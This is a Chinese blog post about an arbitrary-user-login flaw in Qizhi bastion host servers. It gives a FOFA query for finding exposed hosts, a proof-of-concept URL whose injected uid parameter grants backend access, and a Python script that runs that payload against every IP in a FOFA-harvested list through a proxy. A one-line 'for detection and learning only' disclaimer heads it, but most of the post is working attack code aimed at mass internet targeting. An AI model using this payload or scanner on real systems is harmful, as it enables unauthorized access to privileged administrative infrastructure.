1. 程式人生 > 其它 >齊治堡壘機任意使用者登入漏洞

齊治堡壘機任意使用者登入漏洞

宣告:僅供漏洞檢測和學習,勿用於非法測試

漏洞資訊

浙江齊治科技股份有限公司是一家主要經營計算機軟硬體、網路產品的技術開發等專案的公司,近日,HW期間情報齊治運維堡壘機服務端存在任意使用者登入系統漏洞,訪問特定的Url即可獲得後臺許可權。漏洞情報洩露時間:2021-04-10 23:03:05

fofa查詢語法

app=“齊治科技-堡壘機”

POC

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

批量檢測指令碼

可以先用fofa批量獲取ip -》批量爬取fofa查詢的目標ip地址

from requests.packages import urllib3
urllib3.disable_warnings()
import requests
from colorama import init
init(autoreset=True)
headers = {
			'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',
		}

for url in open("./app=齊治科技-堡壘機.txt",'r'):
	#讀取出來的資料預設加了換行符,這裡要去掉
	url = url.strip("\n")
	vu_url = url + "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
	try:
		re = requests.get(url=vu_url,headers=headers,verify=False,timeout=10,proxies={'https':'127.0.0.1:7890'})
		if "您尚未登入或者您的會話已超時,請 重新登入系統" in re.text:
			print(f"{url}漏洞不存在")
		elif "錯誤的id" in re.text:
			print(f"\033[0;32m{vu_url}漏洞存在\033[0m")
	except:
		print(f"{url}無響應")
print('ok')